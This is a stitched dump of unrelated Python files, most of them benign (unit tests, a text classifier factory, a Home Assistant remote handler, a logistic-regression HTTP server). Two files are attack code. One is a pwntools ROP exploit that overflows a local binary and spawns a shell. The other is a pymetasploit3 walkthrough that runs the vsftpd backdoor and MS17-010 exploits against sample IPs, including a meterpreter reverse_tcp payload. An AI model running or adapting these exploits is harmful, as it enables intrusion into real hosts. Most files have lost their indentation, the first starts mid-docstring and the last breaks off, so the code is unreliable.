This test compares the costs of unit converting 1000 data points
        using pure python and then using our adapter code.  A factor of
2.5 is pretty lousy I'd say, so we don't want to do this much.
At the edge of function boundaries is OK.
"""
### Parameters ########################################################
# Slowdown we will allow compared to standard python evaluation
allowed_slowdown = 2.5
# Number of timer iterations.
N = 1000
### Standard execution ################################################
setup = "from numpy import arange\n" \
"from scimath.units.length import meters, feet\n" \
"from scimath import units\n" \
"depth_meters = arange(1000)\n"
code = "depth_feet = units.convert(depth_meters, meters, feet)\n" \
"depth2_feet = depth_feet + depth_feet\n" \
"depth2_meters = units.convert(depth2_feet, feet, meters)\n"
std = timeit.Timer(code, setup)
std_res = std.timeit(N)
### Adapter execution #################################################
# Adapter is set up to convert depth meters->feet and
# depth2 feet->meters
setup = "from numpy import arange\n" \
"from scimath.units.length import meters, feet\n" \
"from codetools.contexts.api import DataContext, AdaptedDataContext\n" \
"from scimath.units.api import UnitArray\n" \
"from codetools.contexts.api import UnitConversionAdapter\n" \
"data_context = DataContext()\n" \
"context = AdaptedDataContext(context=data_context)\n" \
"adapter = UnitConversionAdapter(getitem_units={'depth':feet, 'depth2':meters})\n" \
"context.push_adapter(adapter)\n" \
"context['depth'] = UnitArray(arange(1000),units=meters)\n" \
"compiled = compile('depth2 = depth + depth','foo','exec')\n"
code = "exec(compiled, globals(), context)\n"
adp = timeit.Timer(code, setup)
adp_res = adp.timeit(N)
slowdown = adp_res/std_res
        msg = 'actual slowdown: %f, time per iteration: %f s' % (slowdown, adp_res / N)
print("[actual slowdown=%3.2f] " % slowdown)
assert slowdown < allowed_slowdown, msg
if __name__ == '__main__':
unittest.main()
|
11482774
|
from pwn import *
r=process('./bin13')
context.log_level = 'debug'
elf=ELF('bin13')
readAddr=0x806e490
hackBss=0x80ec3a0
padding=0x4c*'a'#fucking IDApro!
rop=''
rop+=padding
rop+=p32(readAddr)
rop+=p32(hackBss)
rop+=p32(0)
rop+=p32(hackBss)
rop+=p32(45)
r.sendlineafter('put?\n','-1')
r.sendlineafter('data\n',rop)
r.sendline(asm(shellcraft.sh()))
r.interactive()
|
11482794
|
from pymetasploit3.msfrpc import MsfRpcClient
## Usage example
# Connect to the RPC server
client = MsfRpcClient('<PASSWORD>')
# Get an exploit object
exploit = client.modules.use('exploit', 'unix/ftp/vsftpd_234_backdoor')
# Set the exploit options
exploit['RHOST'] = "192.168.115.80"
exploit['RPORT'] = "21"
# Execute the exploit, success will return a jobid
exploit.execute(payload="cmd/unix/interact")
# Find all available sessions
print("Sessions avaiables : ")
for s in client.sessions.list.keys():
print(s)
# Get a shell object
shell = client.sessions.session(list(client.sessions.list.keys())[0])
# Write to the shell
shell.write('whoami')
# Print the output
print(shell.read())
# Stop the shell
shell.stop()
## Console
# Create a console and get the new console ID
client.consoles.console().cid
# >>> "1"
# Destroy a console
client.consoles.console('1').destroy
# Write to console
client.consoles.console('1').write('show options')
# Read from console
client.consoles.console('1').read()
# >>> {'data': 'Global Options:\n===============\n\n Option...'
# 'prompt': '\x01\x02msf5\x01\x02 \x01\x02> ',
# 'busy': False}
# Check if console is busy
client.consoles.console('1').is_busy()
# >>> False
## Modules
# List exploit modules
client.modules.exploits
# >>> ['aix/local/ibstat_path',
# 'aix/rpc_cmsd_opcode21',
# 'aix/rpc_ttdbserverd_realpath',
# ...]
# Use a module
exploit = client.modules.use('exploit', 'unix/ftp/vsftpd_234_backdoor')
# Set module options
exploit['RHOST'] = "192.168.115.80"
exploit['RPORT'] = "21"
# Get required options
exploit.required
# >>> ['RHOSTS', 'RPORT', 'SSLVersion', 'ConnectTimeout']
# Get required options that haven't been set yet
exploit.missing_required
# >>> ['RHOSTS']
# See all the options which have been set
exploit.runoptions
# >>> {'VERBOSE': False,
# 'WfsDelay': 0,
# 'EnableContextEncoding': False,
# 'DisablePayloadHandler': False,
# 'RPORT': 21,
# 'SSL': False,
# 'SSLVersion': 'Auto',
# 'SSLVerifyMode': 'PEER',
# 'ConnectTimeout': 10,
# 'TCP::max_send_size': 0,
# 'TCP::send_delay': 0}
# Get the CVE/OSVDB/BID of an exploit
exploit.references
# >>> [['CVE', '2013-4011'],
# ['OSVDB', '95420'],
# ['BID', '61287'],
# ['URL', 'http://www-01.ibm.com/support/docview.wss?uid=isg1IV43827'],
# ['URL', 'http://www-01.ibm.com/support/docview.wss?uid=isg1IV43756']]
# Get an option's info
exploit.optioninfo('RHOSTS')
# >>> {'type': 'addressrange',
# 'required': True,
# 'advanced': False,
# 'evasion': False,
# 'desc': 'The target address range or CIDR identifier'}
# Get targets
exploit.targets
# >>> {0: 'Automatic'}
# Set the target
exploit.target = 0
# Get target-compatible payloads
exploit.targetpayloads()
# >>> ['cmd/unix/interact']
# Execute the module
# If 'job_id' is None, the module failed to execute
exploit.execute(payload='cmd/unix/interact')
# >>> {'job_id': 1, 'uuid': 'hb2f0yei'}
# Execute the module and return the output
cid = client.consoles.console().cid
client.consoles.console(cid).run_module_with_output(exploit, payload='cmd/unix/interact')
# >>> '... [-] 127.0.0.1:21 - Exploit failed [unreachable]: Rex::ConnectionRefused \
# The connection was refused by the remote host (127.0.0.1:21).\n[*] Exploit completed, but no session was created.\n'
## Sessions
# Get all sessions
client.sessions.list
# >>> {'1': {'type': 'meterpreter',
# 'tunnel_local': '192.168.1.2:4444',
# [...]
# 'platform': 'windows'}}
# Get a session's info
client.sessions.session('1').info
# Write to a session
client.sessions.session('1').write('help')
# Read a session
client.sessions.session('1').read()
# >>> '\nCore Commands\n=============\n\n Command Description\n ------- [...]'
# Run a command and wait for the output
client.sessions.session('1').run_with_output('arp')
# >>> '\nArp stuff'
# Run a shell command within a meterpreter session
client.sessions.session('1').run_shell_cmd_with_output('whoami')
# How to set Payload Options
# Some exploits need to set payload options, here's an example on how to do so
exploit = client.modules.use('exploit', 'windows/smb/ms17_010_psexec')
exploit['RHOSTS'] = '172.28.128.13'
# create a payload object as normal
payload = client.modules.use('payload', 'windows/meterpreter/reverse_tcp')
# add payload-specific options
payload['LHOST'] = '172.28.128.1'
payload['LPORT'] = 4444
# Execute the exploit with the linked payload, success will return a jobid
exploit.execute(payload=payload)
|
11482837
|
import six
from datasets.django.evaluator import DjangoEvaluator
if six.PY3:
from datasets.conala.evaluator import ConalaEvaluator
from datasets.wikisql.evaluator import WikiSQLEvaluator
|
11482859
|
import os
import unittest
import datetime
from dayone import journal
TEST_DIR_PATH = os.path.split(os.path.abspath(__file__))[0]
JOURNAL_DAYONE_PATH = os.path.join(TEST_DIR_PATH, 'Journal.dayone')
class TestEntryObject(unittest.TestCase):
def setUp(self):
self.entry = journal.Entry(JOURNAL_DAYONE_PATH,
'31A6C3FEB30C4C07AA4784128EC30AAB.doentry')
def test_text(self):
self.assertEqual(self.entry.entry_data['Entry Text'], "Hello, World!")
def test_tags(self):
self.assertEqual(self.entry.entry_data['Tags'], ["Testing"])
def test_photo(self):
photo_path = os.path.join(JOURNAL_DAYONE_PATH,
"photos", "%s.jpg" % self.entry.uuid)
self.assertEqual(photo_path, self.entry.photo)
def test_create_journal_entry(self):
entry = journal.Entry(JOURNAL_DAYONE_PATH)
today = datetime.date.today()
text = "This is a test entry for the date of %s." % today
entry.text = text
entry.save_file()
self.assertEqual(text, entry.text)
class TestJournalObject(unittest.TestCase):
def setUp(self):
self.journal = journal.Journal(JOURNAL_DAYONE_PATH)
def test_get_entries(self):
self.journal.get_entries()
entries = self.journal.entries
self.assertTrue(entries)
def test_filter_by_date(self):
entries = self.journal.filter_by_date(datetime.date.today())
self.assertTrue(entries)
def test_filter_between_dates(self):
TODAY = datetime.date.today()
SEVEN_DAYS_AGO = TODAY - datetime.timedelta(days=7)
entries = self.journal.filter_between_dates(SEVEN_DAYS_AGO, TODAY)
self.assertTrue(entries)
if __name__ == '__main__':
unittest.main()
|
11482880
|
import os
import torch
from models.bert_for_multi_label import (BertFCForMultiLable,
BertCNNForMultiLabel,
BertRCNNForMultiLabel,
BertDPCNNForMultiLabel)
from models.textcnn import TextCNN
from models.textrcnn import TextRCNN
from scheme.error import ModelNotDefinedError
from configs.basic_config import config
class Classifier:
def __init__(self, choose_model: str,
choose_pretrain: str,
resume_path: str):
self.choose_model = choose_model
self.choose_pretrain = choose_pretrain
self.resume_path = resume_path
def __call__(self, num_labels: int):
if self.choose_pretrain == "Bert":
if self.resume_path:
model_dir = self.resume_path
else:
model_dir = config.bert_model_dir
if self.choose_model == "BertFC":
model = BertFCForMultiLable.from_pretrained(
model_dir, num_labels=num_labels)
elif self.choose_model == "BertCNN":
model = BertCNNForMultiLabel.from_pretrained(
model_dir, num_labels=num_labels)
elif self.choose_model == "BertRCNN":
model = BertRCNNForMultiLabel.from_pretrained(
model_dir, num_labels=num_labels)
elif self.choose_model == "BertDPCNN":
model = BertDPCNNForMultiLabel.from_pretrained(
model_dir, num_labels=num_labels)
else:
raise ModelNotDefinedError
elif self.choose_pretrain in ["Word2vec", "Nopretrain"]:
if self.resume_path:
model_dir = self.resume_path
else:
model_dir = None
if self.choose_pretrain == "Word2vec":
pretrain_model_dir = config.word2vec_model_dir
else:
pretrain_model_dir = None
if self.choose_model == "TextCNN":
cnn_config = config.cnn
cnn_config.embedding_pretrained = pretrain_model_dir
cnn_config.embedding_size = config.embedding_size
cnn_config.vocab_size = config.vocab_size
cnn_config.dropout = config.dropout
cnn_config.num_labels = num_labels
if self.resume_path:
model = TextCNN(cnn_config)
state_dict_file = os.path.join(
model_dir, "pytorch_model.bin")
model.load_state_dict(torch.load(state_dict_file))
else:
model = TextCNN(cnn_config)
elif self.choose_model == "TextRCNN":
rcnn_config = config.rcnn
rcnn_config.num_labels = num_labels
if self.resume_path:
model = TextRCNN(rcnn_config)
else:
model = TextRCNN(rcnn_config)
model.load_state_dict(torch.load(model_dir))
else:
raise ModelNotDefinedError
else:
raise ModelNotDefinedError
return model
|
11482897
|
import os
from functools import wraps
if os.getenv('SHARED_MEMORY_USE_LOCK') == '1':
from multiprocessing import Lock
else:
class Lock: # type: ignore
def acquire(self):
pass
def release(self):
pass
_lock = Lock()
def lock(func):
@wraps(func)
def wrapper(*args, **kwargs):
_lock.acquire()
try:
return func(*args, **kwargs)
finally:
_lock.release()
return wrapper
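# Usage sketch (hypothetical function): anything decorated with @lock holds the shared
# lock for the duration of the call, which is a no-op unless SHARED_MEMORY_USE_LOCK=1
# selects the real multiprocessing.Lock.
#
#   @lock
#   def write_block(shm, offset, data):
#       shm.buf[offset:offset + len(data)] = data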
|
11482915
|
import sys
import unittest
import io
from resync.resource import Resource
from resync.resource_list import ResourceList
from resync.capability_list import CapabilityList
from resync.sitemap import Sitemap, SitemapIndexError, SitemapParseError
import subprocess
def run_resync(args):
args.insert(0, './resync-build')
proc = subprocess.Popen(args, stdout=subprocess.PIPE)
(out, err) = proc.communicate()
return(out)
class TestClientLinkOptions(unittest.TestCase):
def test01_no_links(self):
xml = run_resync(['--write-resourcelist',
'http://example.org/t', 'tests/testdata/dir1'])
rl = ResourceList()
rl.parse(fh=io.BytesIO(xml))
self.assertEqual(len(rl), 2)
self.assertEqual(rl.link('describedby'), None)
def test02_resource_list_links(self):
xml = run_resync(['--write-resourcelist',
'--describedby-link=a',
'--sourcedescription-link=b', # will be ignored
'--capabilitylist-link=c',
'http://example.org/t', 'tests/testdata/dir1'])
rl = ResourceList()
rl.parse(fh=io.BytesIO(xml))
self.assertEqual(len(rl), 2)
self.assertNotEqual(rl.link('describedby'), None)
self.assertEqual(rl.link('describedby')['href'], 'a')
self.assertNotEqual(rl.link('up'), None)
self.assertEqual(rl.link('up')['href'], 'c')
def test03_capability_list_links(self):
xml = run_resync(['--write-capabilitylist=resourcelist=rl,changedump=cd',
'--describedby-link=a',
'--sourcedescription-link=b',
'--capabilitylist-link=c']) # will be ignored
capl = CapabilityList()
capl.parse(fh=io.BytesIO(xml))
self.assertEqual(len(capl), 2)
self.assertNotEqual(capl.link('describedby'), None)
self.assertEqual(capl.link('describedby')['href'], 'a')
self.assertNotEqual(capl.link('up'), None)
self.assertEqual(capl.link('up')['href'], 'b')
|
11482942
|
import appdaemon.plugins.hass.hassapi as hass
#
# App to respond to buttons on an Aeotec Minimote
#
# Args:
#
# Minimote can send up to 8 scenes. Odd numbered scenes are short presses of the buttons, even are long presses
#
# Args:
#
#scene_<id>_on - name of the entity to turn on when scene <id> is activated
#scene_<id>_off - name of the entity to turn off when scene <id> is activated. If the entity is a scene it will be turned on.
#scene_<id>_toggle - name of the entity to toggle when scene <id> is activated
#
# Each scene can have up to one of each type of action, or no actions - e.g. you can turn on one light and turn off another light for a particular scene if desired
#
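# Example (hypothetical) apps.yaml entry wiring two buttons, assuming the remote is
# Z-Wave JS node 5 and this file is deployed as module "minimote":
#
# living_room_minimote:
#   module: minimote
#   class: MiniMote
#   node_id: 5
#   scene_1_toggle: light.living_room
#   scene_3_on: scene.movie_time
#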
class MiniMote(hass.Hass):
def initialize(self):
self.listen_event(self.zwave_event, "zwave_js_value_notification", node_id = self.args["node_id"])
def zwave_event(self, event_name, data, kwargs):
#self.log("Event: {}, data = {}, args = {}".format(event_name, data, kwargs))
scene = data["value"]
on = "scene_{}_on".format(scene)
off = "scene_{}_off".format(scene)
toggle = "scene_{}_toggle".format(scene)
panic_mode = "off"
if "panic_mode_boolean" in self.args:
panic_mode = self.get_state(self.args["panic_mode_boolean"])
panic_entity = self.args["panic_entity"]
if panic_mode == "on":
self.log("Panic Mode! Turning {} on".format(panic_entity))
self.turn_on(panic_entity)
elif on in self.args:
self.log("Turning {} on".format(self.args[on]))
self.turn_on(self.args[on])
elif off in self.args:
type, id = self.args[off].split(".")
if type == "scene":
self.log("Turning {} on".format(self.args[off]))
self.turn_on(self.args[off])
else:
self.log("Turning {} off".format(self.args[off]))
self.turn_off(self.args[off])
elif toggle in self.args:
self.log("Toggling {}".format(self.args[toggle]))
self.toggle(self.args[toggle])
|
11483065
|
from django.conf.urls import include, url
from rest_framework import routers
from audit.views import AuditLogViewSet
router = routers.DefaultRouter()
router.register(r"", AuditLogViewSet, basename="audit")
urlpatterns = [url(r"^", include(router.urls))]
|
11483106
|
from dataclasses import dataclass
from dataclasses import field
from datetime import date
from typing import NewType
CategoryId = NewType("CategoryId", int)
@dataclass
class Category:
primary_key: CategoryId
name: str
cost: int
class Token:
def is_expired(self):
return True
PriceId = NewType("PriceId", int)
@dataclass
class Price:
primary_key: PriceId
cost: int
period: int
ProfileId = NewType("ProfileId", int)
@dataclass
class Profile:
primary_key: ProfileId
balance: int
def has_enough_balance(self, price):
return self.balance >= price.cost
SubscriptionId = NewType("SubscriptionId", int)
@dataclass
class Subscription:
primary_key: SubscriptionId
created: date = field(default=date(2019, 1, 1), repr=False)
def is_expired(self):
expiration = {1: False, 7: True}
return expiration[self.primary_key]
|
11483141
|
from lxml import etree
from StringIO import StringIO
from collections import deque
import log
logger = log.getlogger("rendertree", log.DEBUG)
class RenderTree(object):
def __init__(self, roots=[]):
self.roots = roots
class RenderTreeNode(object):
def __init__(self, info="", xml=None, children=[], parent=None):
self.info = info
self.xml = xml
self.children = children
self.parent = parent
def __str__(self):
return "info={}, xml={}".format(self.info, str(self.xml))
def parse_xmltree(xml):
try:
t = etree.parse(StringIO(xml))
except Exception as e:
logger.exception(e)
logger.info("XML Parser failed parsing. Reparsing with recover=True")
parser = etree.XMLParser(recover=True)
t = etree.parse(StringIO(xml), parser)
return t
def merge_into_xhtmltree(main_page, iframes_content):
t = parse_xmltree(main_page)
for k, v in iframes_content.iteritems():
if "/head" in k:
continue
el = t.xpath(k, namespaces={'xhtml':'http://www.w3.org/1999/xhtml'})
        if len(el) != 1:  # either no match, or the xpath is ambiguous
logger.warning("{} iframes were found with {}".format(len(el), k))
if len(el) > 0:
subt_root = el[0]
subt = parse_xmltree(v)
subt_root.insert(0, subt.getroot())
else:
logger.warning("No iframes found.")
return t
def _recurs_tree_creation(xml_n, rend_parent_n):
rend_n = RenderTreeNode()
rend_n.parent = rend_parent_n
rend_n.xml = xml_n
if isinstance(xml_n, etree._Comment):
rend_n.info = "comment"
else:
rend_n.info = xml_n.tag
rend_n.children = []
for xml_c in xml_n.getchildren():
rend_n.children.append(_recurs_tree_creation(xml_c, rend_n))
return rend_n
def build_rendertree(xhtml):
rend_tree = RenderTree()
xml_root = xhtml.getroot()
rend_root = _recurs_tree_creation(xml_root, rend_tree)
rend_tree.roots = [rend_root]
return rend_tree
_IGNORE_TAGS = ["html", "head", "script", "meta", "link", "base", "style", "title"]
def _remove_namespace(tag):
NSes = ["{http://www.w3.org/1999/xhtml}", "{http://www.w3.org/2000/svg}"]
for ns in NSes:
if ns in tag:
return tag[len(ns):]
return tag
def remove_invisible_nodes(rend_tree):
"""
We visit the render tree to delete all XML elements that
are not visible. If the node has children, they are inserted in
"""
Q = deque(rend_tree.roots) # initialize the queue with the roots (usually only one root)
cnt = 0
while len(Q) > 0:
#print "QUEUE: ", ",".join([_remove_namespace(el.info) for el in Q])
n = Q.popleft()
if _remove_namespace(n.info) in _IGNORE_TAGS or n.info == "comment":
#print " !!!!! DELETE !!!!! ", _remove_namespace(n.info)
"""
- we visit n's children and update parent
"""
for c in n.children:
c.parent = n.parent
"""
- then we visit n.parent and:
1) delete n from children, and
2) insert at the position of n
all the children of n
"""
if isinstance(n.parent, RenderTree): # n is a root
child_pos = n.parent.roots.index(n)
n.parent.roots = n.parent.roots[0:child_pos] + n.children + n.parent.roots[child_pos+1:]
else: # n is an inner node
child_pos = n.parent.children.index(n)
n.parent.children = n.parent.children[0:child_pos] + n.children + n.parent.children[child_pos+1:]
cnt += 1
Q.extend(n.children)
print "Deleted {} nodes".format(cnt)
return rend_tree
def save_xml_to_file(xml, file):
import codecs
with codecs.open(file, "w", encoding="utf-8") as f:
f.write(etree.tostring(xml, pretty_print=True))
def load_xml_from_file(file):
t = None
with open(file, "r") as f:
t = etree.parse(f)
return t
|
11483147
|
from brightics.common.exception import BrighticsFunctionException
def get_required_parameters(func):
import inspect
def _check_required(param):
return param.default is inspect.Parameter.empty and (param.kind is not inspect.Parameter.VAR_POSITIONAL and param.kind is not inspect.Parameter.VAR_KEYWORD)
signature = inspect.signature(func)
return [p.name for p in signature.parameters.values() if _check_required(p)]
def is_empty(value):
if isinstance(value, list) or isinstance(value, str):
return not value
return False
def check_required_parameters(func, params, excluded_param_keys=None):
if excluded_param_keys is None:
excluded_param_keys = []
required_params = get_required_parameters(func)
params_to_check = [param for param in required_params if param not in excluded_param_keys]
for rp in params_to_check:
if (rp not in params) or is_empty(params[rp]):
raise BrighticsFunctionException.from_errors([{'0033': [rp]}])
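# Usage sketch (hypothetical function): check_required_parameters raises a
# BrighticsFunctionException (error code 0033) when a required argument is missing
# or empty, e.g.
#
#   def profile_table(table, input_cols, group_by=None):
#       ...
#
#   check_required_parameters(profile_table, {'table': df, 'input_cols': []})
#   # -> raises, because 'input_cols' is present but empty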
|
11483177
|
from pathlib import Path
from addok.config import config
from addok.db import DB
@config.on_load
def load_scripts():
root = Path(__file__).parent / 'lua'
for path in root.glob('*.lua'):
with path.open() as f:
name = path.name[:-4]
globals()[name] = DB.register_script(f.read())
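# After config load, each lua/<name>.lua file is exposed as a module-level callable
# named <name>, backed by redis-py's Script object, e.g. (hypothetical script name):
#
#   zinter(keys=['k1', 'k2'], args=[10])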
|
11483183
|
import socket
import ftplib
from ftplib import FTP
import sys
if __name__ == "__main__":
    login = str(sys.argv[1])
    passwd = str(sys.argv[2])
#ftp = FTP('ftp.debian.org') # connect to host, default port
#ftp.login()
#print(ftp)
# FTP() expects a bare hostname, so keep the host and the remote path separate
host = 'ftp.sltac.cls.fr'
path = '/Core/SEALEVEL_GLO_PHY_L4_REP_OBSERVATIONS_008_047/dataset-duacs-rep-global-merged-allsat-phy-l4-v3'
#port=990
ftp = FTP(host)
ftp.login(login, passwd)
ftp.cwd(path)
|
11483200
|
import numpy as np
def hilbert3d(X, bit_length):
"""Compute the order using Hilbert indexing.
Arguments
---------
X : (N, ndim) float array
The positions
bit_length : integer
The bit_length for the indexing.
"""
X = np.atleast_2d(X)
    # State diagram for the 3D Hilbert curve: 24 rows of 8 values,
    # reshaped to (12, 2, 8) and transposed below.
    state_diagram = (
        np.array(
            [
                1, 2, 3, 2, 4, 5, 3, 5,
                0, 1, 3, 2, 7, 6, 4, 5,
                2, 6, 0, 7, 8, 8, 0, 7,
                0, 7, 1, 6, 3, 4, 2, 5,
                0, 9, 10, 9, 1, 1, 11, 11,
                0, 3, 7, 4, 1, 2, 6, 5,
                6, 0, 6, 11, 9, 0, 9, 8,
                2, 3, 1, 0, 5, 4, 6, 7,
                11, 11, 0, 7, 5, 9, 0, 7,
                4, 3, 5, 2, 7, 0, 6, 1,
                4, 4, 8, 8, 0, 6, 10, 6,
                6, 5, 1, 2, 7, 4, 0, 3,
                5, 7, 5, 3, 1, 1, 11, 11,
                4, 7, 3, 0, 5, 6, 2, 1,
                6, 1, 6, 10, 9, 4, 9, 10,
                6, 7, 5, 4, 1, 0, 2, 3,
                10, 3, 1, 1, 10, 3, 5, 9,
                2, 5, 3, 4, 1, 6, 0, 7,
                4, 4, 8, 8, 2, 7, 2, 3,
                2, 1, 5, 6, 3, 0, 4, 7,
                7, 2, 11, 2, 7, 5, 8, 5,
                4, 5, 7, 6, 3, 2, 0, 1,
                10, 3, 2, 6, 10, 3, 4, 4,
                6, 1, 7, 0, 5, 2, 4, 3,
            ]
        )
        .reshape(12, 2, 8)
        .T
    )
x_bit_mask, y_bit_mask, z_bit_mask = (
np.zeros(bit_length, dtype=bool) for _ in range(3)
)
i_bit_mask = np.zeros(3 * bit_length, dtype=bool)
npoint = X.shape[0]
order = np.zeros(npoint)
# Convert positions to binary
for ip in range(npoint):
for i in range(bit_length):
mask = 0b01 << i
x_bit_mask[i] = X[ip, 0] & mask
y_bit_mask[i] = X[ip, 1] & mask
z_bit_mask[i] = X[ip, 2] & mask
for i in range(bit_length):
# Interleave bits
i_bit_mask[3 * i + 2] = x_bit_mask[i]
i_bit_mask[3 * i + 1] = y_bit_mask[i]
i_bit_mask[3 * i] = z_bit_mask[i]
# Build Hilbert ordering using state diagram
cstate = 0
for i in range(bit_length - 1, -1, -1):
sdigit = (
4 * i_bit_mask[3 * i + 2]
+ 2 * i_bit_mask[3 * i + 1]
+ 1 * i_bit_mask[3 * i]
)
nstate = state_diagram[sdigit, 0, cstate]
hdigit = state_diagram[sdigit, 1, cstate]
i_bit_mask[3 * i + 2] = hdigit & 0b100
i_bit_mask[3 * i + 1] = hdigit & 0b010
i_bit_mask[3 * i] = hdigit & 0b001
cstate = nstate
# Compute ordering
for i in range(3 * bit_length):
order[ip] = order[ip] + i_bit_mask[i] * 2 ** i
return order
def get_cpu_list(ds, X):
"""
Return the list of the CPU intersecting with the positions
given. Note that it will be 0-indexed.
Parameters
----------
ds : Dataset
The dataset containing the information
X : (N, ndim) float array
An array containing positions. They should be between 0 and 1.
"""
X = np.atleast_2d(X)
if X.shape[1] != 3:
raise NotImplementedError("This function is only implemented in 3D.")
levelmax = ds.parameters["levelmax"]
ncpu = ds.parameters["ncpu"]
ndim = ds.parameters["ndim"]
xmin, ymin, zmin = X.min(axis=0)
xmax, ymax, zmax = X.max(axis=0)
dmax = max(xmax - xmin, ymax - ymin, zmax - zmin)
ilevel = 0
deltax = dmax * 2
while deltax >= dmax:
ilevel += 1
deltax = 0.5 ** ilevel
lmin = ilevel
bit_length = lmin - 1
maxdom = 2 ** bit_length
imin, imax, jmin, jmax, kmin, kmax = 0, 0, 0, 0, 0, 0
if bit_length > 0:
imin = int(xmin * maxdom)
imax = imin + 1
jmin = int(ymin * maxdom)
jmax = jmin + 1
kmin = int(zmin * maxdom)
kmax = kmin + 1
dkey = (2 ** (levelmax + 1) / maxdom) ** ndim
ndom = 1
if bit_length > 0:
ndom = 8
idom, jdom, kdom = (np.zeros(8, dtype="int64") for _ in range(3))
idom[0], idom[1] = imin, imax
idom[2], idom[3] = imin, imax
idom[4], idom[5] = imin, imax
idom[6], idom[7] = imin, imax
jdom[0], jdom[1] = jmin, jmin
jdom[2], jdom[3] = jmax, jmax
jdom[4], jdom[5] = jmin, jmin
jdom[6], jdom[7] = jmax, jmax
kdom[0], kdom[1] = kmin, kmin
kdom[2], kdom[3] = kmin, kmin
kdom[4], kdom[5] = kmax, kmax
kdom[6], kdom[7] = kmax, kmax
bounding_min, bounding_max = np.zeros(ndom), np.zeros(ndom)
for i in range(ndom):
if bit_length > 0:
order_min = hilbert3d([idom[i], jdom[i], kdom[i]], bit_length)
else:
order_min = 0
bounding_min[i] = (order_min) * dkey
bounding_max[i] = (order_min + 1) * dkey
bound_key = {}
for icpu in range(1, ncpu + 1):
bound_key[icpu - 1], bound_key[icpu] = ds.hilbert_indices[icpu]
cpu_min, cpu_max = (np.zeros(ncpu + 1, dtype="int64") for _ in range(2))
for icpu in range(1, ncpu + 1):
for i in range(ndom):
if (
bound_key[icpu - 1] <= bounding_min[i]
and bound_key[icpu] > bounding_min[i]
):
cpu_min[i] = icpu - 1
if (
bound_key[icpu - 1] < bounding_max[i]
and bound_key[icpu] >= bounding_max[i]
):
cpu_max[i] = icpu
ncpu_read = 0
cpu_list = []
cpu_read = np.zeros(ncpu, dtype="bool")
for i in range(ndom):
for j in range(cpu_min[i], cpu_max[i]):
if not cpu_read[j]:
ncpu_read += 1
cpu_list.append(j)
cpu_read[j] = True
return sorted(cpu_list)
|
11483210
|
import sys
import json
import pandas as pd
import numpy as np
import pickle
from http.server import BaseHTTPRequestHandler, HTTPServer
MODEL = None
MODEL_FILENAME = "model.pickle"
def create_and_persist_model():
global MODEL
from keras.datasets import fashion_mnist
(x, y), _ = fashion_mnist.load_data()
classes = ['tshirt', 'trouser', 'pullover', 'dress', 'coat', 'sandal', 'shirt', 'shoe', 'bag', 'boot']
from sklearn.model_selection import train_test_split
x_train, x_test, y_train, y_test = train_test_split(x[:1000].reshape(-1, 28 * 28), y[:1000].flatten(), test_size=0.25, random_state=0)
# Prepare examples
y_train_1 = y_train == 1
y_test_1 = y_test == 1
from sklearn.linear_model import LogisticRegression
MODEL = LogisticRegression(solver='liblinear').fit(x_train, y_train_1)
pickle.dump(MODEL, open(MODEL_FILENAME, "wb" ))
def restore_model():
global MODEL
    MODEL = pickle.load(open(MODEL_FILENAME, "rb"))
class ML_RequestHandler(BaseHTTPRequestHandler):
def predict(self, image):
prediction = MODEL.predict(np.asarray([image]).astype('u8'))
return bool(prediction[0])
def do_POST(self):
content_len = int(self.headers.get('Content-Length'))
post_body = self.rfile.read(content_len)
image = json.loads(post_body)
prediction = json.dumps({"is_trousers": self.predict(image)})
print(prediction)
# Send response status code
self.send_response(200)
# Send headers
self.send_header('Content-type','application/json')
self.end_headers()
# Send message back to client
# Write content as utf-8 data
self.wfile.write(bytes(prediction, "utf8"))
return
def run_server():
print('starting server...')
server_address = ('127.0.0.1', 8001)
httpd = HTTPServer(server_address, ML_RequestHandler)
print('running server...')
httpd.serve_forever()
try:
restore_model() # The first time that this script is run, the model will be created and cached. Thereafter it is reused.
except:
create_and_persist_model()
if __name__ == '__main__':
run_server()
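# Example request against the running server (hypothetical payload: a 28x28 image
# flattened to 784 pixel values):
#
#   import requests
#   requests.post("http://127.0.0.1:8001", json=[0] * 784).json()
#   # -> {"is_trousers": False}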
|
11483226
|
import os, sys, inspect
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(currentdir)
sys.path.insert(0, parentdir)
import storage
def read(fn):
d = dict()
lines = storage.read_file(fn, True)
for line in lines:
edgeid = int(line.split("=")[0])
d[edgeid] = line[:-1].split("=")[1].split(",")
return d
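# Example (hypothetical file contents): each line is "<edge id>=<comma-separated values>",
# so a file containing
#   12=3,7,9
#   15=2
# yields {12: ['3', '7', '9'], 15: ['2']} (the values stay as strings).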
|
11483233
|
import tensorflow as tf
import random
import numpy as np
from .registry import register
def generate_batch(params):
features = []
labels = []
sequence_lengths = []
target_mask = []
# helper to mask total_list
total_mask = [-1] * (params.num_digits + 1)
for _ in range(params.batch_size):
feature = []
label = []
total = 0
mask = []
sequence_length = random.randint(1, params.max_difficulty)
sequence_lengths.append(sequence_length)
# generate one number
for i in range(sequence_length):
num_digits = random.randint(1, params.num_digits)
value = []
for _ in range(num_digits):
value.append(random.randint(0, 9))
# remove zero if value start with zero
while value and value[0] == 0:
value.pop(0)
# add to total if value is not zero
if value:
total += int(''.join(map(str, value)))
# convert int to list of int
total_list = list(map(int, str(total)))
# pad value with -1
value += [-1] * (params.num_digits - len(value))
            # pad digits beyond the end of the target number with -1
total_list += [-1] * (params.num_digits + 1 - len(total_list))
# mask number of digits
mask.append((1 - np.equal(total_list, total_mask).astype(int)).tolist())
feature.append(value)
label.append(total_list)
# pad samples, targets to sequence length
sequence_offset = params.max_difficulty - sequence_length
feature += [[-1] * params.num_digits] * sequence_offset
label += [[-1] * (params.num_digits + 1)] * sequence_offset
mask += [[0] * (params.num_digits + 1)] * sequence_offset
assert len(feature) == len(label) == len(mask)
features.append(feature)
labels.append(label)
target_mask.append(mask)
return features, sequence_lengths, target_mask, labels
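# Quick manual check (hypothetical hyper-parameter object; only the fields used by
# generate_batch are required):
#
#   from types import SimpleNamespace
#   params = SimpleNamespace(batch_size=4, max_difficulty=5, num_digits=3)
#   features, seq_lengths, target_mask, labels = generate_batch(params)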
@register("addition")
def input_fn(data_sources, params, training):
def _input_fn():
""" Generate batch_size number of addition samples
        pad both x and y with -1 to match the sequence length and number of digits
        y has 11 classes; the 11th class indicates that the number is complete
Returns:
x: shape=(batch_size, max_difficulty, num_digits * 10),
randomly generated integer
seq_length: shape(batch_size,). sequence length for each input
            y: shape=(batch_size, max_difficulty, (num_digits + 1) * 11),
sum of x until the current index
"""
get_batch = lambda: generate_batch(params)
